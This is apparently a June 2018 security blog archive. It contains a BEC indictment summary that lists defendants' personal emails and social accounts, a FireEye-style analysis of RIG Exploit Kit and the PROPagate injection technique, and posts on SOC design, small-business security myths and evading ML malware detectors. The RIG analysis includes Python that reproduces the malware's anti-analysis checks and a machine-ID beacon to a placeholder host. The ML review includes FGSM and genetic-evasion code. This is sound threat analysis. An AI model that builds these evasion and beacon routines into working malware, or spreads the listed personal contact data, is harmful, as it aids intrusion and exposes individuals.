Monthly Archives: June 2018

Memphis BEC Scammers Arrested and At Large

The FBI announced another round of Business Email Compromise arrests this past week.  This time, the focus was on Memphis, Tennessee.  According to the Western District of Tennessee press release, "Eight Arrested in Africa-Based Cybercrime and Business Email Compromise Conspiracy", the individuals involved stole more than $15 Million!

The main indictment, originally filed in August 2017, charges 11 individuals with a variety of offenses related to their Business Email Compromise [BEC] crimes.


Count 1: 18 USC §1349.F - Attempt and Conspiracy to Commit Mail Fraud - penalties of up to 20 years in prison and fines of up to $250,000, plus supervised release for up to 3 years.

Counts 2-8: 18 USC §1343.F - Fraud by Wire, Radio, or Television - penalties of up to 20 years in prison and fines of up to $250,000, plus supervised release for up to 3 years.

Count 9: 18 USC §§1956-4390.F - Money Laundering - Embezzlement, Other - penalties of up to 20 years in prison and fines of up to $500,000, plus supervised release for up to 3 years.

Count 10: 18 USC §371.F - Conspiracy to Defraud the United States - penalties of up to 5 years in prison and fines of up to $250,000, plus supervised release for up to 1 year.

Counts 11-14: 18 USC §1028A.F - Fraud with Identification Documents + Aggravated Identity Theft - 2 years incarceration consecutive to any other sentence imposed, plus fines of not more than $250,000.

1. Babatunde Martins (Counts 1,9,10,11)
2. Victor Daniel Fortune Okorhi (Counts 1,9,10)
3. Benard Emurhowhoariogho Okorhi (Counts 1, 2, 3, 9, 10)
4. Maxwell Peter (Counts 1, 4, 6, 7, 8, 9, 10, 11, 14)
5. Dennis Miah - (Counts 1,9,10,11,13)
6. Sumaila Hardi Wumpini - (Counts 1,9,10)
7. Olufolajimi Abegunde (USM # 71343-019), (Counts 1,9,12)
8. Ayodeji Olumide Ojo (Counts 1,9,12)
9. Dana Brady (Counts 1,9)
10. James Dean (USM # 52637-076)  (Counts 1,9)
11. Javier Luis Ramos Alonso, 28,  (USM #24513-111) (Counts 1, 5, 9, 12)

In a separate indictment, Rashid Abdulai was charged with much of the same, his key role being control of five TD Bank accounts that were used to launder funds.

The primary victim in this case seems to be "Company A", a real estate company in Memphis, which is foolishly identified in the indictment through the carelessness of the author.  I've chosen to redact that detail myself, but DAMN!  When you describe the company in such a way that there is exactly one such company on planet earth, you are failing to keep faith with your victim companies.  Shame!

Fortunately, the indictment also shares a lot of details on the defendants:

RASHID ABDULAI, age 24
a citizen of Ghana, residing in Bronx, New York
controlled at least five TD Bank accounts

BABATUNDE MARTINS, age 62
email: papamart2000@yahoo.com
Company: Afriocean LTD
Nigerian citizen living in Ghana

VICTOR DANIEL FORTUNE OKORHI, age 35 -  *** STILL AT LARGE AND WANTED***
emails:  vicfoko@yahoo.com, VicdarycorriLTD@gmail.com, vicdarycomltd@icloud.com
Company: Vicdary Company LTD
Nigerian citizen living in Ghana

BENARD EMURHOWHOARIOGHO OKORHI, age 39
emails: Marc.Richards@aol.com, benardokorhi@yahoo.com
Company: Coolben Royal Links LTD
Nigerian citizen living in Ghana

MAXWELL ATUGBA ABAYETA (AKA Peter Maxwell, AKA Maxwell Peter), age 26
emails: petermaxwell200@gmail.com, sandarlin200@yahoo.com
social accounts: Facebook.com/maxwell.peter.5688
citizen of Ghana

DENNIS MIAH (AKA Dennis Brown, AKA Dr. Den Brown), age 34 -  *** STILL AT LARGE AND WANTED***
emails: JimRoyAirSeal1@yahoo.com, drdenbrown@yahoo.com
social accounts: Facebook.com/Oga.Bossson, Twitter.com/Oga.Bossson
citizen of Ghana

SUMAILA HARDI WUMPINI, age 29 - *** STILL AT LARGE AND WANTED***
email: hardi765_new@hotmail.com
social accounts: Facebook.com/Wumpini.Hardy
resident of Ghana

OLUFOLAJIMI ABEGUNDE, age 31
Nigerian citizen residing in Atlanta, Georgia

AYODEJI OLUMIDE OJO, age 35 -  *** STILL AT LARGE AND WANTED***
Nigerian citizen, lives with ABEGUNDE in Atlanta when in United States

DANA BRADY, aged 61
emails: bradydana50@gmail.com
US Citizen residing in Auburn, Washington

JAMES DEAN, aged 65
US Citizen, residing in Plainfield, Indiana

JAVIER LUIS RAMOS ALONSO, aged 28
Mexican citizen, residing in Seaside, California

D. G. -
emails: d2t2green696@gmail.com, d2t2green696@yahoo.com
US Citizen residing in Mississippi

J.R.
emails: LRIGNWM@yahoo.com
US Citizen residing in New Jersey

M.Z.
emails: CMIMIGO@aol.com
US Citizen residing in Utah

T.W. - US Citizen residing in Tennessee
J.B. - US Citizen residing in Alabama
C.M. - US Citizen residing in Tennessee (Western District)
C.W. - US Citizen residing in Tennessee
A.K. - US Citizen residing in Tennessee (Western District)
V.M. - US Citizen residing in Georgia

How It Worked

Martins, Maxwell, Benard Okorhi, Victor Okorhi, and/or Miah would obtain the IP addresses of potentially vulnerable email servers and target them for intrusion.  Using US-based IP addresses offered through VPN services, they would access a variety of websites, including credit card transaction processors and dating websites.  Their role in the conspiracy also included originating the spoofed emails that are explained later.

Martins, both Okorhis, Maxwell, Miah, Wumpini, Brady, Dean, Ojo, and others would open bank accounts for receiving fraudulently-obtained funds and sending them to other accounts controlled by their co-conspirators.  

Because they had control of email accounts at Crye-Leike, they could tell when fund transfers related to real estate sales were scheduled to take place.  They would then spoof the email addresses of those involved in the transactions and send instructions causing the financial transfers to be redirected to accounts controlled by members of the conspiracy.

The funds were then laundered in a variety of ways, including using the funds to purchase goods, including construction materials, cell phones, and other electronics, and having those goods shipped to Ghana for use or resale to benefit the members of the conspiracy.

Maxwell, Miah, and both Okorhis created false identities and set up dating profiles with false emails to match those false identities.  Through these, they lured victims into online romance scams, gold-buying scams, and a variety of advance-fee fraud scams.  These romance scam victims would carry out acts on behalf of the conspiracy, including forwarding counterfeit checks, receiving and shipping merchandise, and transferring proceeds via wire, US Mail, ocean freight, and express package delivery services.

Martins, Maxwell, Miah, and both Okorhis also purchased stolen PII, including credit card information, banking information, and IP addresses from underground forums specializing in the sale of such information.

By purchasing cell phones in the United States and activating Voice-over-IP (VoIP) accounts, the conspirators in Africa could use US telephone numbers, allowing them to appear to be making their calls from within the United States.

Some of the activity in this case dates back to 2012, when MIAH was already using fraudulently purchased credit cards and Remote Desktop Protocol (RDP) to make online purchases that appeared to originate in the United States.  (Hackers compromise US computers and set them up for RDP so that foreign criminals can use them to originate credit card purchases in the place where the credit card was issued.  By having, say, a Memphis, Tennessee IP address, purchases made with a Memphis, Tennessee credit card do not seem as suspicious.)

Specific Acts

Some of their crimes were extremely bold.  For example:

"On or about December 13, 2016, MIAH caused construction materials to be purchased with fraudulently obtained funds, and caused a freight container of construction supplies to be sent to him in Ghana."  WHAT?!?!  That's bold!

The compromise of the email accounts at Company A was in play by June 30, 2016, when $33,495 was wired to the wrong recipient based on information gleaned from the stolen emails.

In August 2016, OJO opened a new Wells Fargo bank account, after his previous account at Bank of America was shut down due to fraud.  He used ABEGUNDE's new address (presumably in Atlanta, Georgia) as the address for the new account.

He also opened a Wells Fargo account at the same address in October 2016.

Benard Okorhi sent emails as "Marc.Richards@aol.com" directing C.M. to obtain cash advances from credit cards and send the proceeds to recipients in Ghana.  He also ordered C.M. to purchase five iPhones and ship them to Ghana.

Miah used the "DrDenBrown@yahoo.com" email to tell Okorhi (as Marc.Richards) to smooth things out on the phone with a romance scam victim, because Okorhi had a better American accent.

Some of the other interesting "acts" in the conspiracy included:

25JUL2016 - Javier Luis Ramos Alonso accepts a $154,371 wire from Company A into his Wells Fargo account ending in 7688 and then sends the funds to accounts controlled by OJO in Atlanta.

26MAY2017 - Maxwell Peter sends a WhatsApp message directing an undercover Memphis FBI agent to receive a $15,000 check on his behalf.  Ooops!

30MAY2017 - Maxwell Peter directs the FBI agent to send $5,000 of the proceeds to himself in Ghana.

02JUN2017 - Maxwell Peter directs the FBI agent to send a $15,000 check to himself in Ghana.

Although the indictment doesn't lay out more of the particular acts, the Press Release says that this group stole more than $15 Million altogether!

Some interesting images

"M.Z." has an interesting Amazon Wish List for a romance scammer involved in shipping electronics:

On December 8, 2017, Abdulai is asked in one of his WhatsApp chats:  "Hope Maxwell case didn't put you into any problem."  He responded, "FBI came to my house asking me stuff about those transactions that was coming into my account so I'm tryna stay out f this whatapp n stuff for a while cuz I feel like they tracking me."

You got that right, Abdulai!



10 Internet Security Myths that Small Businesses Should Be Aware Of

Most small businesses don’t put as much focus on internet security as they probably should. If you are a small business owner or manager, not focusing on internet security could put you in a bad spot. Are you believing the myths about internet security, or are you already using best practices? Here are a few of the most common myths…take a look to see where you truly stand:

Myth – All You Need is a Good Antivirus Program

Do you have a good antivirus program on your small business network? Do you think that’s enough? Unfortunately, it’s not. Though an antivirus program is great to have, there is a lot more that you have to do. Also, keep in mind that more people than ever are working remotely, and odds are good that they are working on a network that is not secured.

Myth – If You Have a Good Password, Your Data is Safe

Yes, a strong password is essential to keeping your information safe, but that alone is not going to do much if a hacker is able to get it somehow. Instead, setting up two-factor authentication is essential. This is much safer. Also make sure that your team doesn’t write their passwords down and keep them close to the computer or worse, use the same passwords across multiple critical accounts.

Myth – Hackers Only Target Large Businesses, So I Don’t Have to Worry

Unfortunately, many small business owners believe that hackers won’t target them because they only go after big businesses. This isn’t true, either. No one is immune to the wrath of hackers, and even if you are the only employee, you are a target.

Myth – Your IT Person Can Solve All of Your Issues

Small business owners also believe that if they have a good IT person, they don’t have to worry about cybercrime. This, too, unfortunately, is a myth. Though having a good IT person on your team is a great idea, you still won’t be fully protected. Enlist outside “penetration testers” who are white-hat hackers that seek out vulnerabilities in your networks before the criminals do.

Myth – Insurance Will Protect You from Cybercrime

Wrong! While there are actually several insurance companies that offer policies that “protect” businesses from cybercrime, they don’t proactively protect your networks; they provide relief in the event you are hacked. But read the fine print: if you are severely negligent, then all bets may be off. Cyber insurance is, in fact, one of the fastest-growing policy types in the industry.

Myth – Cyber Crimes are Overrated

Though it would certainly be nice if this myth were true, it simply isn’t. These crimes are very real and could be very dangerous to your company. Your business is always at risk. Reports show as many as 4 billion records were stolen in 2016.

Myth – My Business is Safe as Long as I Have a Firewall

This goes along with the antivirus myth. Yes, it’s great to have a good firewall, but it won’t fully protect your company. You should have one, as they do offer a good level of protection, but you need much more to get full protection.

Myth – Cybercriminals are Always People You Don’t Know

Unfortunately, this, too, is not true. Even if it is an accident, many instances of cybercrimes can be traced back to someone on your staff. It could be an employee who is angry about something or even an innocent mistake. But, it only takes a single click to open up your network to the bad guys.

Myth – Millennials are Very Cautious About Internet Security

We often believe that Millennials are very tech-savvy; even more tech-savvy than the rest of us. Thus, we also believe that they are more cautious when it comes to security. This isn’t true, though. A Millennial is just as likely to put your business at risk as any other employee.

Myth – My Company Can Combat Cyber Criminals

You might have a false bravado about your ability to combat cybercrime. The truth is, you are probably far from prepared if you are like the majority.

These myths run rampant in the business world, so it is very important to make sure that you are fully prepared to handle cybercrime.

Robert Siciliano is a Security and Identity Theft Expert. He is the founder of Safr.me, a cybersecurity speaking and consulting firm based in Massachusetts. See him discussing internet and wireless security on Good Morning America.

RIG Exploit Kit Delivering Monero Miner Via PROPagate Injection Technique

Introduction

Through FireEye Dynamic Threat Intelligence (DTI), we observed RIG Exploit Kit (EK) delivering a dropper that leverages the PROPagate injection technique to inject code that downloads and executes a Monero miner (similar activity has been reported by Trend Micro). Apart from leveraging a relatively lesser known injection technique, the attack chain has some other interesting properties that we will touch on in this blog post.

Attack Chain

The attack chain starts when the user visits a compromised website that loads the RIG EK landing page in an iframe. The RIG EK uses various techniques to deliver the NSIS (Nullsoft Scriptable Install System) loader, which leverages the PROPagate injection technique to inject shellcode into explorer.exe. This shellcode executes the next payload, which downloads and executes the Monero miner. The flow chart for the attack chain is shown in Figure 1.


Figure 1: Attack chain flow chart

Exploit Kit Analysis

When the user visits a compromised site that is injected with an iframe, the iframe loads the landing page. The iframe injected into a compromised website is shown in Figure 2.


Figure 2: Injected iframe

The landing page contains three different JavaScript snippets, each of which uses a different technique to deliver the payload. None of these techniques are new, so we will only give a brief overview of each one in this post.

JavaScript 1

The first JavaScript has a function, fa, which returns a VBScript that will be executed using the execScript function, as shown by the code in Figure 3.


Figure 3: JavaScript 1 code snippet

The VBScript exploits CVE-2016-0189, which allows it to download the payload and execute it using the code snippet seen in Figure 4.


Figure 4: VBScript code snippet

JavaScript 2

The second JavaScript contains a function that will retrieve additional JavaScript code and append this script code to the HTML page using the code snippet seen in Figure 5.


Figure 5: JavaScript 2 code snippet

This newly appended JavaScript exploits CVE-2015-2419, which utilizes a vulnerability in JSON.stringify. This script obfuscates the call to JSON.stringify by storing pieces of the exploit in the variables shown in Figure 6.


Figure 6: Obfuscation using variables

Using these variables, the JavaScript calls JSON.stringify with malformed parameters in order to trigger CVE-2015-2419 which in turn will cause native code execution, as shown in Figure 7.


Figure 7: Call to JSON.Stringify

JavaScript 3

The third JavaScript has code that adds additional JavaScript, similar to the second JavaScript. This additional JavaScript adds a flash object that exploits CVE-2018-4878, as shown in Figure 8.


Figure 8: JavaScript 3 code snippet

Once the exploitation is successful, the shellcode invokes a command line to create a JavaScript file with filename u32.tmp, as shown in Figure 9.


Figure 9: WScript command line

This JavaScript file is launched using WScript, which downloads the next-stage payload and executes it using the command line in Figure 10.


Figure 10: Malicious command line

Payload Analysis

For this attack, the actor has used multiple payloads and anti-analysis techniques to bypass the analysis environment. Figure 11 shows the complete malware activity flow chart.


Figure 11: Malware activity flow chart

Analysis of NSIS Loader (SmokeLoader)

The first payload dropped by the RIG EK is a compiled NSIS executable famously known as SmokeLoader. Apart from NSIS files, the payload has two components: a DLL, and a data file (named ‘kumar.dll’ and ‘abaram.dat’ in our analysis case). The DLL has an export function that is invoked by the NSIS executable. This export function has code to read and decrypt the data file, which yields the second stage payload (a portable executable file).

The DLL then spawns itself (dropper) in SUSPENDED_MODE and injects the decrypted PE using process hollowing.

Analysis of Injected Code (Second Stage Payload)

The second stage payload is a highly obfuscated executable. It consists of a routine that decrypts a chunk of code, executes it, and re-encrypts it.

At the entry point, the executable contains code that checks the OS major version, which it extracts from the Process Environment Block (PEB). If the OS version value is less than 6 (prior to Windows Vista), the executable terminates itself. It also contains code that checks whether the process is being debugged, by reading the BeingDebugged flag at offset 0x2 of the PEB. If the flag is set, the executable terminates itself.
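
For analysts who want to reproduce these checks on a test machine, here is a minimal Python/ctypes sketch approximating the same two tests; it relies on documented wrappers (sys.getwindowsversion and IsDebuggerPresent, which reads the same BeingDebugged byte of the PEB) rather than parsing the PEB directly.

    import ctypes
    import sys

    def os_version_ok():
        # The payload aborts when the OS major version is < 6,
        # i.e. anything older than Windows Vista.
        return sys.getwindowsversion().major >= 6

    def being_debugged():
        # IsDebuggerPresent() returns the BeingDebugged byte at offset 0x2 of the
        # current process's PEB, which is the same flag the malware reads.
        return bool(ctypes.windll.kernel32.IsDebuggerPresent())

    if __name__ == "__main__":
        print("OS version check passed:", os_version_ok())
        print("Debugger detected:", being_debugged())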

The malware also implements an anti-VM check by opening the registry key HKLM\SYSTEM\ControlSet001\Services\Disk\Enum and reading the value named 0. It checks whether the value data contains any of the strings vmware, virtual, qemu, or xen, each of which is indicative of a virtual machine.
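
An equivalent check can be sketched with Python's standard winreg module; the key, value name and marker substrings are the ones listed above, while everything else is illustrative.

    import winreg

    VM_MARKERS = ("vmware", "virtual", "qemu", "xen")

    def disk_enum_looks_virtual():
        # Open HKLM\SYSTEM\ControlSet001\Services\Disk\Enum and read the value named "0",
        # which holds the hardware identifier string of the first disk device.
        key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                             r"SYSTEM\ControlSet001\Services\Disk\Enum")
        try:
            data, _type = winreg.QueryValueEx(key, "0")
        finally:
            winreg.CloseKey(key)
        data = data.lower()
        return any(marker in data for marker in VM_MARKERS)

    if __name__ == "__main__":
        print("VM markers found in disk enum string:", disk_enum_looks_virtual())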

After running the anti-analysis and environment check, the malware starts executing the core code to perform the malicious activity.

The malware uses the PROPagate injection method to inject and execute the code in a targeted process. The PROPagate method is similar to the SetWindowLong injection technique. In this method, the malware uses the SetPropA function to modify the callback for UxSubclassInfo and cause the remote process to execute the malicious code.

This code injection technique only works for a target process with a lesser or equal integrity level. The malware first checks whether the integrity of the currently running process is medium integrity level (0x2000, SECURITY_MANDATORY_MEDIUM_RID). Figure 12 shows the code snippet.


Figure 12: Checking integrity level of current process

If the process is higher than medium integrity level, then the malware proceeds further. If the process is lower than medium integrity level, the malware respawns itself with medium integrity.

The malware creates a file mapping object and writes the dropper's file path to it; the same mapping object is later accessed by the injected code to read the dropper's file path and delete the dropper file. The name of the mapping object is derived from the volume serial number of the system drive and an XOR operation with a hardcoded value (Figure 13).

File Mapping Object Name = “Volume Serial Number” + “Volume Serial Number” XOR 0x7E766791


Figure 13: Creating file mapping object name
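
To illustrate the naming scheme, the following Python/ctypes sketch derives the same string from the system drive's volume serial number; the hexadecimal rendering and concatenation order are assumptions about how the two values are formatted into the final name.

    import ctypes

    def mapping_object_name(drive="C:\\"):
        # GetVolumeInformationW fills in the volume serial number of the given drive.
        serial = ctypes.c_uint32(0)
        ok = ctypes.windll.kernel32.GetVolumeInformationW(
            drive, None, 0, ctypes.byref(serial), None, None, None, 0)
        if not ok:
            raise ctypes.WinError()
        # Name = serial number concatenated with (serial number XOR 0x7E766791);
        # rendering both as hex is an assumption about the exact formatting.
        return "{:08X}{:08X}".format(serial.value, serial.value ^ 0x7E766791)

    if __name__ == "__main__":
        print(mapping_object_name())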

The malware then decrypts the third stage payload using XOR and decompresses it with RtlDecompressBuffer. The third stage payload is also a PE executable, but the author has modified the header of the file to avoid it being detected as a PE file during memory scanning. After restoring several header fields at the start of the decrypted data, we can recover the proper executable header (Figure 14).


Figure 14: Injected executable without header (left), and with header (right)

After decrypting the payload, the malware targets the shell process, explorer.exe, for malicious code injection. It uses GetShellWindow and GetWindowThreadProcessId APIs to get the shell window’s thread ID (Figure 15).


Figure 15: Getting shell window thread ID

The malware injects and maps the decrypted PE in a remote process (explorer.exe). It also injects shellcode that is configured as a callback function in SetPropA.

After injecting the payload into the target process, it uses the EnumChildWindows and EnumProps functions to enumerate all entries in the property list of the shell window and compares each one with UxSubclassInfo.

After finding the UxSubclassInfo property of the shell window, it saves the handle info and uses it to set the callback function through SetPropA.
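
As a side note for analysts, the presence of the UxSubclassInfo property on the shell window can be verified from user mode without any injection; a minimal, read-only Python/ctypes sketch using GetShellWindow and GetPropW follows.

    import ctypes
    from ctypes import wintypes

    user32 = ctypes.windll.user32
    user32.GetShellWindow.restype = wintypes.HWND
    user32.GetPropW.restype = wintypes.HANDLE
    user32.GetPropW.argtypes = [wintypes.HWND, wintypes.LPCWSTR]

    def shell_window_has_uxsubclassinfo():
        # GetShellWindow returns the Shell's desktop window, owned by explorer.exe.
        hwnd = user32.GetShellWindow()
        if not hwnd:
            return False
        pid = wintypes.DWORD(0)
        user32.GetWindowThreadProcessId(hwnd, ctypes.byref(pid))
        print("Shell window 0x%X belongs to PID %d" % (hwnd, pid.value))
        # GetPropW returns the data handle stored under the named property, or NULL if
        # absent; this is the property whose callback pointer PROPagate overwrites.
        return bool(user32.GetPropW(hwnd, "UxSubclassInfo"))

    if __name__ == "__main__":
        print("UxSubclassInfo present on shell window:", shell_window_has_uxsubclassinfo())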

SetPropA has three arguments, the third of which is the data handle. The callback procedure address is stored at offset 0x14 from the beginning of that data. The malware overwrites the callback address with the address of the injected shellcode (Figure 16).


Figure 16: Modifying callback function

The malware then sends a specific message to the window to execute the callback procedure corresponding to the UxSubclassInfo property, which leads to the execution of the shellcode.

The shellcode contains code to execute the address of the entry point of the injected third stage payload using CreateThread. It then resets the callback for SetPropA, which was modified by malware during PROPagate injection. Figure 17 shows the code snippet of the injected shellcode.


Figure 17: Assembly view of injected shellcode

Analysis of Third Stage Payload

Before executing the malicious code, the malware performs anti-analysis checks to make sure no analysis tool is running in the system. It creates two infinitely running threads that contain code to implement anti-analysis checks.

The first thread enumerates the processes using CreateToolhelp32Snapshot and checks for the process names generally used in analysis. It generates a DWORD hash value from the process name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the corresponding process.

The second thread enumerates the windows using EnumWindows. It uses GetClassNameA function to extract the class name associated with the corresponding window. Like the first thread, it generates a DWORD hash value from the class name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the process related to the corresponding window.

Other than these two anti-analysis techniques, it also has code to check the internet connectivity by trying to reach the URL: www.msftncsi[.]com/ncsi.txt.

To remain persistent on the system, the malware installs a scheduled task and a shortcut file in the %startup% folder. The scheduled task is named “Opera Scheduled Autoupdate {Decimal Value of GetTickCount()}”.

The malware then communicates with the malicious URL to download the final payload, which is a Monero miner. It creates an MD5 hash value from the computer name and the volume information using Microsoft CryptoAPIs, and sends the hash to the server in a POST request. Figure 18 shows the network communication.


Figure 18: Network communication
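
A rough Python equivalent of that identifier generation is sketched below; the exact fields, their concatenation order and the destination URL are assumptions, so the snippet only computes the hash and leaves the POST as a commented placeholder.

    import ctypes
    import hashlib

    def machine_id():
        # Computer name via GetComputerNameW.
        size = ctypes.c_uint32(256)
        buf = ctypes.create_unicode_buffer(size.value)
        ctypes.windll.kernel32.GetComputerNameW(buf, ctypes.byref(size))
        # Volume serial number of the system drive via GetVolumeInformationW.
        serial = ctypes.c_uint32(0)
        ctypes.windll.kernel32.GetVolumeInformationW(
            "C:\\", None, 0, ctypes.byref(serial), None, None, None, 0)
        # MD5 over the concatenation; the field choice and order are assumptions.
        return hashlib.md5("{}{:08X}".format(buf.value, serial.value).encode()).hexdigest()

    # The sample then sends this value to its server in a POST request, e.g. (placeholder URL):
    #   requests.post("http://<malicious-host>/", data={"id": machine_id()})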

The malware then downloads the final payload, the Monero miner, from the server and installs it in the system.

Conclusion

Although we have been observing a decline in Exploit Kit activity, attackers are not abandoning them altogether. In this blog post, we explored how RIG EK is being used with various exploits to compromise endpoints. We have also shown how the NSIS Loader leverages the lesser known PROPagate process injection technique, possibly in an attempt to evade security products.

FireEye MVX and the FireEye Endpoint Security (HX) platform detect this attack at several stages of the attack chain.

Acknowledgement

We would like to thank Sudeep Singh and Alex Berry for their contributions to this blog post.

Why Do SOCs Look Like This?

When you hear the word "SOC," or the phrase "security operations center," what image comes to mind? Do you think of analysts sitting at desks, all facing forward, towards giant screens? Why is this?

The following image is from the outstanding movie Apollo 13, a docudrama about the challenged 1970 mission to the moon.


It's a screen capture from the go for launch sequence. It shows mission control in Houston, Texas. If you'd like to see video of the actual center from 1970, check out This Is Mission Control.

Mission control looks remarkably like a SOC, doesn't it? When builders of computer security operations centers imagined what their "mission control" rooms would look like, perhaps they had Houston in mind?

Or perhaps they thought of the 1983 movie War Games?


Reality was way more boring however:


I visited NORAD under Cheyenne Mountain in 1989, I believe, when visiting the Air Force Academy as a high school senior. I can confirm it did not look like the movie depiction!

Let's return to mission control. Look at the resources available to personnel manning the mission control room. The big screens depict two main forms of data: telemetry and video of the rocket. What about the individual screens, where people sit? They are largely customized. Each station presents data or buttons specific to the role of the person sitting there. Listen to Ed Harris' character calling out the stations: booster, retro, vital, etc. For example:


This is one of the key differences between mission control and any modern computerized operations center. In the 1960s and 1970s, workstations (literally, places where people worked) had to be customized. They lacked the technology to have generic workstations where customization was done via screen, keyboard, and mouse. They also lacked the ability to display video on demand, and relied on large television screens. Personnel with specific functions sat at specific locations, because that was literally the only way they could perform their jobs.

With the advent of modern computing, every workstation is instantly customizable. There is no need to specialize. Anyone can sit anywhere, assuming computers allow one's workspace to follow their logon. In fact, modern computing allows a user to sit in spaces outside of their office. A modern mission control could be distributed.

With that in mind, what does the current version of mission control look like? Here is a picture of the modern Johnson Space Center's mission control room.



It looks similar to the 1960s-1970s version, except it's dominated by screens, keyboards, and mice.

What strikes me about every image of a "SOC" that I've ever seen is that no one is looking at the big screens. They are almost always deployed for an audience. No one in an operational role looks at them.

There are exceptions. Check out the Arizona Department of Transportation operations center.


Their "big screen" is a composite of 24 smaller screens showing traffic and roadways. No one is looking at the screen, but that sort of display is perfect for the human eye.

It's a variant of Edward Tufte's "small multiple" idea. There is no text. The eye can discern if there is a lot of traffic, or little traffic, or an accident pretty easily. It's likely more for the benefit of an audience, but it works decently well.

Compare those screens to what one is likely to encounter in a cyber SOC. In addition to a "pew pew" map and a "spinning globe of doom," it will likely look like this, from R3 Cybersecurity:


The big screens are a waste of time. No one is standing near them. No one sitting at their workstations can read what the screens show. They are purely for an audience, who can't discern what they show either.

The bottom line for this post is that if you're going to build a "SOC," don't build it based on what you've seen in the movies, or in other industries, or what a consultancy recommends. Spend some time determining your SOC's purpose, and let the workflow drive the physical setting. You may determine you don't even need a "SOC," either physically or logically, based on maturing understandings of a SOC's mission. That's a topic for a future post!

Attacking Machine Learning Detectors: the state of the art review

Machine learning (ML) is a powerful approach to detecting malware. It is widely used by both the technical community and the scientific community, with two different perspectives: performance vs. robustness. The technical community tries to improve ML performance in order to increase usability at scale, while the scientific community focuses on robustness, meaning how easy it would be to attack an ML detection engine. Today I'd like to focus our attention a little bit on the second perspective, pointing out how to attack ML detection engines.

We might start by classifying machine learning attacks into three main sets:

  1. Direct Gradient-Based Attack. The attacker knows the ML model: both its structure and its weights. This allows him to make direct queries to the model and figure out the best way to evade it.
  2. Score Model Attack. This attack set is based on scoring systems. The attacker does not know the machine learning model nor its weights, but he has direct access to the detection engine, so he can probe the machine learning model. The model returns a score, and based on that score the attacker is able to work out how to minimise it by crafting specific inputs.
  3. Binary Black-Box Attack. The attacker has no idea about the machine learning model or its weights, and no idea about the scoring system either, but he has unlimited access to probe the model.
Direct Gradient-Based Attack

A direct gradient-based attack can be implemented in at least two ways. The first, and most common, is to apply small changes to the original sample in order to reduce the score it receives. The changes must be confined to a specific domain, for example valid Windows PE files or valid PDF files, and so forth. The changes must be small, and they should be generated so as to minimise a scoring function derived from the model weights (which are known in a direct gradient-based attack). The second way is to connect the targeted model (the model under attack) to a generator model in a generative adversarial network (GAN). Unlike the previous approach, the GAN generator learns how to generate a completely new sample, derived from a given seed, that minimises the scoring function.

I. Goodfellow et al., in their work "Explaining and Harnessing Adversarial Examples" (here), showed how small changes targeted to minimise the resulting score on a given sample X are effective in ML evasion. Another great work, by K. Grosse et al., is titled "Adversarial Perturbations Against Deep Neural Networks for Malware Classification" (here). The authors attacked a deep learning Android malware model, based on the DREBIN Android malware data set, by applying an imperceptible perturbation to the feature vector. They obtained very interesting results, achieving evasion rates from 50% to 84%. I. Goodfellow et al., in their work titled "Generative Adversarial Nets" (here), developed a GAN able to iterate a series of adversarial rounds to generate samples that were classified as "ham" by the targeted model but that really were not. The following image shows how generative adversarial nets are trained by simultaneously updating the discriminative distribution (D, blue dashed line) so that it discriminates between samples from the data-generating distribution px (black dotted line) and those of the generative distribution pg (G, green solid line).

Image from: "Generative Adversarial Nets"
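
To make the "small gradient-driven changes" idea concrete, the following NumPy sketch implements the fast gradient sign method (FGSM) from the Goodfellow et al. paper in its generic form; the feature vector and the gradient below are placeholders for whatever white-box detector is being attacked.

    import numpy as np

    def fgsm_perturb(x, grad_wrt_input, epsilon=0.01):
        """Fast Gradient Sign Method: move each feature a small step epsilon in the
        direction indicated by the gradient, pushing the sample towards the class
        the attacker wants (e.g. benign).

        x               -- feature vector of the original sample (numpy array)
        grad_wrt_input  -- gradient of the model's loss with respect to x
        """
        return x + epsilon * np.sign(grad_wrt_input)

    # Toy usage with a placeholder gradient (in a real attack this comes from the
    # white-box model, whose weights are known in a direct gradient-based attack).
    x = np.random.rand(16)
    fake_gradient = np.random.randn(16)
    x_adv = fgsm_perturb(x, fake_gradient, epsilon=0.05)
    print("L-inf distance between original and adversarial sample:",
          np.max(np.abs(x_adv - x)))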



Score Model Attack

The attacker's posture in this attack set can be described as "myopic". The attacker does not know exactly how the ML model works and has no idea how the weights inside the ML algorithm change, but he has the chance to test his samples and get a score back, so he is able to measure the effect of each input perturbation.

W. Xu, Y. Qi and D. Evans, in their work titled "Automatically Evading Classifiers" (here), implemented a "fitness function" which gives a fitness score to each generated variant. A variant with a positive fitness score is evasive: the fitness score captures the condition that the targeted model classifies the current sample as benign while the sample retains its malicious behaviour. Once a sample gets a high fitness score, it is used as a seed for a more general genetic algorithm which manipulates the seed in order to produce different species. To ensure that those mutations preserve the malicious behaviour of the original seed, the authors used an oracle; in that case, the Cuckoo sandbox.

Image from: "Automatically evading classifiers"


After one week of execution, the genetic algorithm had found more than 15k evasive variants from roughly 500 malicious seeds, achieving a 100% evasion rate against the PDFrate classifier.
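
The overall loop can be sketched in a few lines of Python; the mutation operator, the classifier score and the sandbox oracle below are stand-ins for the PDF-specific machinery used in the paper.

    import random

    def evolve(seed, mutate, classifier_score, oracle_is_malicious,
               population_size=40, generations=100):
        """Toy genetic search for evasive variants.

        mutate(sample)            -- returns a randomly modified copy of the sample
        classifier_score(sample)  -- score from the target model (lower = more benign)
        oracle_is_malicious(s)    -- sandbox oracle confirming the behaviour is preserved
        """
        population = [seed]
        evasive = []
        for _ in range(generations):
            candidates = [mutate(random.choice(population)) for _ in range(population_size)]
            # Keep only variants that still behave maliciously according to the oracle.
            candidates = [c for c in candidates if oracle_is_malicious(c)]
            # Fitness is positive when the target classifier thinks the variant is benign.
            scored = sorted(candidates, key=classifier_score)
            evasive += [c for c in scored if classifier_score(c) < 0.5]
            population = scored[:population_size // 2] or population
        return evasive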

Binary black-box attacks

